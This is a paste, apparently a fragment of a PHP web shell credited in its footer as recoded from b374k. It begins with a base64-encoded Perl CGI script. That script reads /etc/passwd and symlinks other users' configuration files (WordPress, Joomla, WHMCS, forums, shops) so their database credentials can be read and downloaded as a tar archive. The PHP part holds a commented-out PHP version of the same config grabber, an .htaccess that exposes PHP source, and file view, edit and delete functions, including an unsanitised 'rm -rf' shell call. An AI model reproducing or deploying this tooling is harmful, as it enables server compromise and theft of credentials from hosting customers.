L2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLWpvb21sYS1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy12YjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy1pbmNsdWRlcy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htMTUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy13aG0tV0hNQ1MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHAvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLXdobS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1ob3N0cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGhhaGFnYXkuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictYmlsbGluZy50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1tYW5hZ2UudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL215L2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1teXNob3AudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC96ZW5jYXJ0L2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkaGFoYWdheS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHAnLCRoYWhhZ2F5Lictc21mLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywkaGFoYWdheS4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL1NldHRpbmdzLnBocCcsJGhhaGFnYXkuJy1zbWYtZm9ydW0udHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRoYWhhZ2F5Lictc21mLWZvcnVtcy50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictdXAudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictdXAyLnR4dCcpOyANCn0NCmlmICgkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICdQT1NUJykgew0KICByZWFkKFNURElOLCAkYnVmZmVyLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCn0gZWxzZSB7DQogICRidWZmZXIgPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsNCn0NCkBwYWlycyA9IHNwbGl0KC8mLywgJGJ1ZmZlcik7DQpmb3JlYWNoICRwYWlyIChAcGFpcnMpIHsNCiAgKCRuYW1lLCAkdmFsdWUpID0gc3BsaXQoLz0vLCAkcGFpcik7DQogICRuYW1lID1+IHRyLysvIC87DQogICRuYW1lID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICR2YWx1ZSA9fiB0ci8rLyAvOw0KICAkdmFsdWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJEZPUk17JG5hbWV9ID0gJHZhbHVlOw0KfQ0KaWYgKCRGT1JNe3Bhc3N9IGVxICIiKXsNCnByaW50ICcNCjxib2R5IGNsYXNzPSJkeiIgYmdjb2xvcj0iIzIyMzM0NCI+DQo8cD5HcmFiIGNvbmZpZ3MgaW4gc2VydmVyPC9wPg0KPHA+T25seSBwYXRoIGxpa2UgIi9ob21lL1VTRVIvcHVibGljX2h0bWwiIGNhbiBiZSBzeW1saW5rZWQ8L3A+DQo8c3Bhbj5QYXN0ZSB0aGUgPGZvbnQgY29sb3I9InJlZCIvPiIvZXRjL3Bhc3N3ZCI8L2ZvbnQ+IGNvbnRlbnQuPC9zcGFuPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBzb2xpZCAjMDBGRjAwOyB3aWR0aDogIDU1NXB4OyBoZWlnaHQ6IDM3MHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiNGRkZGRkY7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjlwdDsgY29sb3I6IGJsYWNrOyIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjJweCBzb2xpZCAjMDBGRjAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6I0ZGRkZGRjsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjpibGFjazsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkhlamVzIGl0dSBjb25maWciIHN0eWxlPSJib3JkZXI6MnB4IHNvbGlkICMwMEZGMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6IGJsYWNrOyB0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojRkZGRkZGOyIgLz48L3A+DQo8L2Zvcm0+PC9zdHJvbmc+DQonOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5lczsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIuJEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxpbmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4iLnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIudHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9ImR6IiBiZ2NvbG9yPSIjMjIzMzQ0Ij4NCjxoMj5TdWNjZXNzIC4uICE8L2gyPg0KPHA+Q2xpY2sgPGEgaHJlZj0iLi8iIHRhcmdldD0iX0JMQU5LIi8+SEVSRTwvYT4gdG8gdmlldyBjb25maWdzPC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250PjwvYT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==");
- chmod($cwd.".PHHM_files/sym/perl/config.hax", 0755);
- }
- echo "<form action=\"?cwd=&action=sym_auto_perl\" method=\"post\">\n".
- " <h1 class=\"cantik\">Config symlink − PERL</h1>\n".
- " <iframe src=\".PHHM_files/sym/perl/config.hax\" style=\"width: 100%; height: 100%;\" class=\"kotak\"></iframe>\n".
- " <noframes>Your browser doesn't support frames, <a href=\".PHHM_files/sym/perl/config.hax\">Click here</a></noframes>\n".
- "</form>";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_php"){
- /*if(!is_file($cwd.".PHHM_files/sym/php/.htaccess")){
- b64wrt($cwd.".PHHM_files/sym/php/.htaccess", "T3B0aW9ucyBhbGwNCkRpcmVjdG9yeUluZGV4IFN1eC5odG1sDQpBZGRUeXBlIHRleHQvcGxhaW4gLnBocA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHANCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbA0KQWRkSGFuZGxlciB0eHQgLmh0bWwNClJlcXVpcmUgTm9uZQ0KU2F0aXNmeSBBbnk=");
- }
- $conflist = array("/public_html/includes/configure.php", "/public_html/os/includes/configure.php", "/public_html/oscom/includes/configure.php", "/public_html/oscommerce/includes/configure.php", "/public_html/oscommerces/includes/configure.php", "/public_html/shop/includes/configure.php", "/public_html/shopping/includes/configure.php", "/public_html/sale/includes/configure.php", "/public_html/amember/config.inc.php", "/public_html/config.inc.php", "/public_html/members/configuration.php", "/public_html/config.php", "/public_html/forum/includes/config.php", "/public_html/forums/includes/config.php", "/public_html/admin/conf.php", "/public_html/admin/config.php", "/public_html/wp-config.php", "/public_html/wp/wp-config.php", "/public_html/WP/wp-config.php", "/public_html/wp/beta/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/press/wp-config.php", "/public_html/wordpress/wp-config.php", "/public_html/Wordpress/wp-config.php", "/public_html/wordpress/beta/wp-config.php", "/public_html/news/wp-config.php", "/public_html/new/wp-config.php", "/public_html/blog/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/blogs/wp-config.php", "/public_html/home/wp-config.php", "/public_html/protal/wp-config.php", "/public_html/site/wp-config.php", "/public_html/main/wp-config.php", "/public_html/test/wp-config.php", "/public_html/conf_global.php", "/public_html/include/db.php", "/public_html/connect.php", "/public_html/mk_conf.php", "/public_html/include/config.php", "/public_html/joomla/configuration.php", "/public_html/protal/configuration.php", "/public_html/joo/configuration.php", "/public_html/cms/configuration.php", "/public_html/site/configuration.php", "/public_html/main/configuration.php", "/public_html/news/configuration.php", "/public_html/new/configuration.php", "/public_html/home/configuration.php", "/public_html/vb/includes/config.php", "/public_html/vb3/includes/config.php", "/public_html/includes/config.php", "/public_html/whm/configuration.php", "/public_html/central/configuration.php", "/public_html/whm/whmcs/configuration.php", "/public_html/whm/WHMCS/configuration.php", "/public_html/whmc/WHM/configuration.php", "/public_html/whmcs/configuration.php", "/public_html/support/configuration.php", "/public_html/supp/configuration.php", "/public_html/secure/configuration.php", "/public_html/secure/whm/configuration.php", "/public_html/secure/whmcs/configuration.php", "/public_html/cpanel/configuration.php", "/public_html/panel/configuration.php", "/public_html/host/configuration.php", "/public_html/hosting/configuration.php", "/public_html/hosts/configuration.php", "/public_html/configuration.php", "/public_html/submitticket.php", "/public_html/clients/configuration.php", "/public_html/client/configuration.php", "/public_html/clientes/configuration.php", "/public_html/cliente/configuration.php", "/public_html/clientsupport/configuration.php", "/public_html/billing/configuration.php", "/public_html/manage/configuration.php", "/public_html/my/configuration.php", "/public_html/myshop/configuration.php", "/public_html/includes/dist-configure.php", "/public_html/zencart/includes/dist-configure.php", "/public_html/shop/includes/dist-configure.php", "/public_html/Settings.php", "/public_html/smf/Settings.php", "/public_html/forum/Settings.php", "/public_html/forums/Settings.php", "/public_html/upload/includes/config.php", "/public_html/up/includes/config.php");
- echo "<form action=\"?cwd=".$cwd."&action=sym_auto_php\" method=\"post\">
- <h1 class=\"cantik\">Config symlink − PHP</h1>";
- if($win && !$posix){ echo "Running on a <b>Windows</b> b0x? Are you sure?"; exit; }
- $getc = explode("\n", file_get_contents("/etc/passwd"));
- foreach($getc as $row){
- $exp = explode(":", $row);
- $user = $exp[0];
- $penuh = "/home/".$user;
- $kaun = 0;
- foreach($conflist as $eachcon){
- if(is_file($penuh.$eachcon)){
- if(symlink($penuh.$eachcon, $cwd.".PHHM_files/sym/php/".$user."---".$eachcon)){
- echo "File available << Pwned =< ".$penuh.$eachcon." to ".$cwd.".PHHM_files/sym/php/".$user.$eachcon."<br />";
- $kaun++;
- }
- }
- }
- return true;
- }
- if($kaun < 2){
- echo $kaun." file pwned using this tool !!";
- } elseif($kaun > 1){
- echo $kaun." files pwned using this tool !!";
- }
- echo "</form>";*/
- echo "This feature is currently disabled";
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "view"){
- $file = $_GET['file'];
- $buff = "<form action=\"?cwd=".$cwd."&action=view;&file=".$file."\" method=\"post\">\n";
- $content = file_get_contents($file);
- if(empty($file)){ $buff .= "GET Parameter \"file\" is empty <br /><br />"; }
- if(is_file($file)){
- $buff .= "Viewing file <b><a href=\"?cwd=".$cwd."&action=edit&file=".str_replace(" ", "+", $file)."\" title=\"Edit File\">".$file."</a></b> - ".ukuran($file)." <br /><br />\n".
- "<div id=\"viewfile\">".nl2br(htmlspecialchars($content))."</div> <br /><br />";
- } else { $buff .= "File (".$file.") does not exist<br /><br />"; }
- $buff .= "</form>";
- echo $buff;
- }
- elseif(isset($_GET['action']) && $_GET['action'] == "edit"){
- if( isset($_POST['submit']) ){
- $file = $_POST['saveas'];
- $content = magicboom($_POST['content']);
- if($filez = fopen($file,"w")){
- $time = @date("d-M-Y H:i",time());
- if(fwrite($filez,$content)) $msg = "file saved @ ".$time;
- else $msg = "failed to save"; fclose($filez);
- } else $msg = "permission denied";
- }
- if(!isset($file)) $file = $_GET['file'];
- if($filez = @fopen($file,"r")){
- $content = "";
- while(!feof($filez)){ $content .= htmlentities(fgets($filez)); }
- fclose($filez);
- }
- echo "<form action=\"?cwd=".$cwd."&action=edit&file=".$file."\" method=\"post\">\n".
- " <textarea cols=\"100\" rows=\"25\" name=\"content\" class=\"kotak\">".$content."</textarea><br />\n".
- " <input type=\"text\" name=\"saveas\" style=\"width: 50%;\" value=\"".$file."\" class=\"kotak\"/>\n".
- " <input type=\"submit\" name=\"submit\" value=\"Save file\" class=\"kotak\">\n".
- "</form>";
- if(isset($_POST['submit'])) echo $msg;
- } else {
- if(isset($_GET['action']) && $_GET['action'] == "del" && $_GET['file'] != ""){
- $file = $_GET['file'];
- @unlink($file);
- }
- if(isset($_GET['action']) && $_GET['action'] == "rmdir" && $_GET['folder'] != ""){
- if($win && !$posix){
- perintah("rmdir ".$_GET['folder']." /S /Q");
- } else {
- perintah("rm -rf ".$_GET['folder']);
- }
- }
- if(isset($_GET['action']) && $_GET['action'] == "mkdir" && $_GET['folder'] != ""){
- $path = $cwd.$_GET['folder'];
- @mkdir($path);
- }
- $buff = filemanager();
- echo $buff;
- }
- ?>
- <!--<footer name="credit">
- − <b>re</b>coded by Cai@nhax - Based on b374k NEC v3 - #PHHM #GILA #HEMPAS #HEJES −
- </footer>-->
- </body>
- </html>
Add Comment
Please, Sign In to add comment